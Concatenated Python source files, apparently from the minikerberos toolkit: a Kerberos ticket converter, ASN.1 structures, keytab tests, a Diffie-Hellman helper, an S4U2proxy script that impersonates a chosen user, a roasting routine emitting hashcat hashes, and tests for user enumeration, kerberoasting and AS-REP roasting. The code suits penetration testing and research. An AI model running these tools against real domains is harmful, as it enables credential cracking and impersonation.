			yield username, TGTTicket2hashcat(kcomm.kerberos_TGT), None
		except Exception as e:
			logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
			yield username, None, e

	



from asysocks.unicomm.common.target import UniTarget, UniProto

class KerberosTarget(UniTarget):
	def __init__(self, ip:str = None, proxies = None, protocol = UniProto.CLIENT_TCP, timeout = 10, port = 88):
		UniTarget.__init__(self, ip, port , protocol, timeout=timeout, proxies = proxies, dc_ip = ip)

	def __str__(self):
		t = '===KerberosTarget===\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for x in self.__dict__[k]:
					t += '    %s: %s\r\n' % (k, x)
			else:
				t += '%s: %s\r\n' % (k, self.__dict__[k])
			
		return t




from asn1crypto import core
from minikerberos.protocol.asn1_structs import Checksum

# GSS_EXTS_FINISHED             2 #Data type for the IAKERB checksum.
# corresponding checksum type: KEY_USAGE_FINISHED            41
# https://tools.ietf.org/html/draft-ietf-kitten-iakerb-03


TAG = 'explicit'

class KRB_FINISHED(core.Sequence):
    _fields = [
        ('gss-mic', Checksum, {'tag_type': TAG, 'tag': 1}),
    ]

	# Contains the checksum [RFC3961] of the GSS-API tokens
	# exchanged between the initiator and the acceptor,
	# and prior to the containing AP_REQ GSS-API token.
	# The checksum is performed over the GSS-API tokens
	# exactly as they were transmitted and received,
	# in the order that the tokens were sent.


class IAKERB_HEADER(core.Sequence):
    _fields = [
        ('target-realm', core.GeneralString, {'tag_type': TAG, 'tag': 1}),
		('cookie', core.OctetString, {'tag_type': TAG, 'tag': 2, 'optional': True}),
    ]


import base64
from minikerberos.protocol.asn1_structs import KRBCRED, EncKrbCredPart, KrbCredInfo, EncryptedData

class Kirbi:
    def __init__(self, kirbiobj:KRBCRED = None):
        self.kirbiobj = kirbiobj

    """
    if isinstance(data, bytes):
            kirbi = KRBCRED.load(data).native
        elif isinstance(data, dict):
            kirbi = data
        elif isinstance(data, KRBCRED):
            kirbi = data.native
        else:
            raise Exception('Unknown data type! %s' % type(data))
    """
    @staticmethod
    def from_file(fpath):
        with open(fpath, 'rb') as f:
            return Kirbi.from_bytes(f.read())
        
    def to_file(self, fpath):
        with open(fpath, 'wb') as f:
            f.write(self.kirbiobj.dump())
    
    
    @staticmethod
    def from_bytes(data):
        k = Kirbi()
        k.kirbiobj = KRBCRED.load(data)
        return k
    
    def to_bytes(self):
        return self.kirbiobj.dump()
    
    @staticmethod
    def from_b64(b64):
        return Kirbi.from_bytes(base64.b64decode(b64))
    
    def to_b64(self):
        return base64.b64encode(self.kirbiobj.dump()).decode()
    
    @staticmethod
    def from_hex(hexdata):
        return Kirbi.from_bytes(bytes.fromhex(hexdata))
    
    def to_hex(self):
        return self.kirbiobj.dump().hex()
    
    @staticmethod
    def from_ticketdata(tgt_or_tgs, encpart):
        ci = {}
        ci['key'] = encpart['key']
        ci['prealm'] = tgt_or_tgs['crealm']
        ci['pname'] = tgt_or_tgs['cname']
        ci['flags'] = encpart['flags']
        ci['authtime'] = encpart['authtime']
        ci['starttime'] = encpart['starttime']
        ci['endtime'] = encpart['endtime']
        ci['renew-till'] = encpart['renew-till']
        ci['srealm'] = encpart['srealm']
        ci['sname'] = encpart['sname']

        ti = {}
        ti['ticket-info'] = [KrbCredInfo(ci)]

        te = {}
        te['etype']  = 0
        te['cipher'] = EncKrbCredPart(ti).dump()

        t = {}
        t['pvno'] = 5
        t['msg-type'] = 22
        t['enc-part'] = EncryptedData(te)
        t['tickets'] = [tgt_or_tgs['ticket']]

        return Kirbi(KRBCRED(t))
    
    @staticmethod
    def format_kirbi(data, n = 100):
        kd = base64.b64encode(data).decode()
        return '    ' + '\r\n    '.join([kd[i:i+n] for i in range(0, len(kd), n)])
    
    def format(self, n = 100):
        return self.format_kirbi(self.kirbiobj.dump(), n=n)

    def describe(self):        
        t = '\r\n'
        for ticket in self.kirbiobj.native['tickets']:
            t += 'Realm        : %s\r\n' % ticket['realm']
            t += 'Sname        : %s\r\n' % '/'.join(ticket['sname']['name-string'])

        if self.kirbiobj.native['enc-part']['etype'] == 0:
            cred = EncKrbCredPart.load(self.kirbiobj.native['enc-part']['cipher']).native
            cred = cred['ticket-info'][0]
            username = cred.get('pname')
            if username is not None:
                username = '/'.join(username['name-string'])
            flags = cred.get('flags')
            if flags is not None:
                flags = ', '.join(flags)

            t += 'UserName     : %s\r\n' % username
            t += 'UserRealm    : %s\r\n' % cred.get('prealm')
            t += 'StartTime    : %s\r\n' % cred.get('starttime')
            t += 'EndTime      : %s\r\n' % cred.get('endtime')
            t += 'RenewTill    : %s\r\n' % cred.get('renew-till')
            t += 'Flags        : %s\r\n' % flags
            t += 'Keytype      : %s\r\n' % cred['key']['keytype']
            t += 'Key          : %s\r\n' % base64.b64encode(cred['key']['keyvalue']).decode()

        t += 'EncodedKirbi : \r\n\r\n'
        t += self.format()
        return t
    
    def get_username(self):
        if self.kirbiobj.native['enc-part']['etype'] == 0:
            cred = EncKrbCredPart.load(self.kirbiobj.native['enc-part']['cipher']).native
            cred = cred['ticket-info'][0]
            username = cred.get('pname')
            if username is not None:
                return '/'.join(username['name-string'])
        return None
    
    def __str__(self):
        return self.describe()


# Description: Tests for the keytab module

import tempfile
import pathlib
from minikerberos.common.keytab import Keytab, KeytabPrincipal, KeytabOctetString
from .config import *


def test_keytab_load():
    for keytabfile in get_testfiles_keytab():
        keytab = Keytab.from_file(keytabfile)
        desc = str(keytab)
        with tempfile.NamedTemporaryFile() as f:
            keytab.to_file(f.name)
            keytab2 = Keytab.from_file(f.name)
            desc2 = str(keytab2)
            assert desc == desc2

def test_keytab_load_bytes():
    for keytabfile in get_testfiles_keytab():
        with open(keytabfile, 'rb') as f:
            keytab_bytes = f.read()
            keytab = Keytab.from_bytes(keytab_bytes)
        desc = str(keytab)
        keytab_bytes = keytab.to_bytes()
        keytab2 = Keytab.from_bytes(keytab_bytes)
        desc2 = str(keytab2)
        assert desc == desc2

def test_principal():
    kp = KeytabPrincipal.empty()
    x, realm = kp.to_asn1()
    kp2 = KeytabPrincipal.from_asn1(x, realm)
    assert kp.to_bytes() == kp2.to_bytes()

def test_octetstring():
    kp = KeytabOctetString.empty()
    x = kp.to_asn1()
    kp2 = KeytabOctetString.from_asn1(x)
    assert kp.to_bytes() == kp2.to_bytes()

def test_octetstring2():
    kp = KeytabOctetString.from_string('1234567890')
    x = kp.to_string()
    kp2 = KeytabOctetString.from_string(x)
    assert kp.to_bytes() == kp2.to_bytes()

def test_tostring():
    for keytabfile in get_testfiles_keytab():
        keytab = Keytab.from_file(keytabfile)
        print(str(keytab))
        desc = str(keytab)
        assert desc

if __name__ == '__main__':
    test_tostring()


import logging
import asyncio

from minikerberos import logger
from minikerberos.common.factory import KerberosClientFactory, kerberos_url_help_epilog
from minikerberos.common.constants import KerberosSecretType
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.kirbi import Kirbi


async def getS4U2proxy(kerberos_url, spn, targetuser, kirbifile = None, ccachefile = None):
	cu = KerberosClientFactory.from_url(kerberos_url)
	client = cu.get_client()
	service_spn = KerberosSPN.from_spn(spn)
	target_user = KerberosSPN.from_upn(targetuser)
	
	if cu.secret_type != KerberosSecretType.CCACHE:
		logger.debug('Getting TGT')
		await client.get_TGT()
		logger.debug('Getting S4Uself')
		tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
	else:
		logger.debug('Getting TGS via TGT from CCACHE')
		for kirbi in client.credential.ccache.get_all_tgt_kirbis():
			try:
				logger.info('Trying to get SPN with %s' % kirbi.get_username())
				ccred_test = KerberosCredential.from_kirbi(kirbi.to_hex(), encoding='hex')
				client = cu.get_client_newcred(ccred_test)
				tgs, encTGSRepPart, key = await client.getST(target_user, service_spn)
				logger.info('Sucsess!')
				break
			except Exception as e:

				logger.debug('This ticket is not usable it seems Reason: %s' % e)
				continue
	
	if ccachefile is not None:
		client.ccache.to_file(ccachefile)
		print('Ticket stored in ccache file %s' % ccachefile)
	
	kirbi = Kirbi.from_ticketdata(tgs, encTGSRepPart)
	print(str(kirbi))
	if kirbifile is not None:
		kirbi.to_file(kirbifile)
		
	logging.info('Done!')
def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Gets an S4U2proxy ticket impersonating given user', formatter_class=argparse.RawDescriptionHelpFormatter, epilog = kerberos_url_help_epilog)
	parser.add_argument('--kirbi', help='kirbi file to store the TGS ticket in, otherwise kirbi will be printed to stdout')
	parser.add_argument('--ccache', help='ccache file to store the TGT ticket in')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('kerberos_url', help='Machine account credentials in kerberos URL format.')
	parser.add_argument('spn', help='the service principal in format <service>/<server-hostname>@<domain> Example: cifs/fileserver.test.corp@TEST.corp for a TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER\'S HOSTNAME MUST BE USED, NOT IP!!!')
	parser.add_argument('targetuser', help='')
	
	args = parser.parse_args()
	if args.verbose == 0:
		logger.setLevel(logging.WARNING)
	elif args.verbose == 1:
		logger.setLevel(logging.INFO)
	else:
		logger.setLevel(1)

	asyncio.run(getS4U2proxy(args.kerberos_url, args.spn, args.targetuser, args.kirbi, args.ccache))
	
	
if __name__ == '__main__':
	main()


import os
from asn1crypto import algos

class DirtyDH:
	def __init__(self):
		self.p = None
		self.g = None
		self.shared_key = None
		self.shared_key_int = None
		self.private_key = os.urandom(32)
		self.private_key_int = int(self.private_key.hex(), 16)
		self.dh_nonce = os.urandom(32)

	@staticmethod
	def from_params(p, g):
		dd = DirtyDH()
		dd.p = p
		dd.g = g
		return dd

	@staticmethod
	def from_dict(dhp):
		dd = DirtyDH()
		dd.p = dhp['p']
		dd.g = dhp['g']
		return dd

	@staticmethod
	def from_asn1(asn1_bytes):
		dhp = algos.DHParameters.load(asn1_bytes).native
		return DirtyDH.from_dict(dhp)
		
	
	def get_public_key(self):
		#y = g^x mod p
		return pow(self.g, self.private_key_int, self.p)
	
	def exchange(self, bob_int):
		self.shared_key_int = pow(bob_int, self.private_key_int, self.p)
		x = hex(self.shared_key_int)[2:]
		if len(x) % 2 != 0:
			x = '0' + x
		self.shared_key = bytes.fromhex(x)
		return self.shared_key


from minikerberos.common.factory import KerberosClientFactory
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.kirbi import Kirbi
from minikerberos.security import krb5userenum, asreproast, kerberoast
from minikerberos.common.target import KerberosTarget
import asyncio
import pytest 
from .config import *


@pytest.mark.asyncio
async def test_userenum_valid():
	target = KerberosTarget(KERBEROS_SERVER)
	found = 0
	async for username, res, response, err in krb5userenum(target, KERBEROS_USERNAMES_VALID, KERBEROS_DOMAIN):
		assert err is None
		assert res is True
		found += 1
	assert found == len(KERBEROS_USERNAMES_VALID)
		

@pytest.mark.asyncio
async def test_userenum_invalid():
	target = KerberosTarget(KERBEROS_SERVER)
	found = 0
	async for username, res, response, err in krb5userenum(target, KERBEROS_USERNAMES_NONEXISTENT, KERBEROS_DOMAIN):
		assert err is None
		assert res is False
		found += 1
	assert found == len(KERBEROS_USERNAMES_NONEXISTENT)
	
@pytest.mark.asyncio
async def test_kerberoast_linux():
	cu = KerberosClientFactory.from_url(KERBEROS_CONN_URL_PW)
	async for username, res, err in kerberoast(cu, KERBEROS_USERNAMES_KERBEROAST, KERBEROS_DOMAIN):
		assert res is not None
		assert err is None
		assert username is not None


@pytest.mark.asyncio
async def test_kerberoast_linux_override():
	cu = KerberosClientFactory.from_url(KERBEROS_CONN_URL_PW)
	async for username, res, err in kerberoast(cu, KERBEROS_USERNAMES_KERBEROAST, KERBEROS_DOMAIN, override_etype=23):
		assert res is not None
		assert err is None
		assert username is not None

@pytest.mark.asyncio
async def test_apreproast_valid():
	target = KerberosTarget(KERBEROS_SERVER)
	async for username, res, err in asreproast(target, KERBEROS_USERNAMES_ASREP, KERBEROS_DOMAIN):
		assert err is None
		assert res is not None

@pytest.mark.asyncio
async def test_apreproast_invalid():
	target = KerberosTarget(KERBEROS_SERVER)
	async for username, res, err in asreproast(target, KERBEROS_USERNAMES_KERBEROAST, KERBEROS_DOMAIN):
		assert err is not None


if __name__ == '__main__':
	asyncio.run(test_userenum_invalid())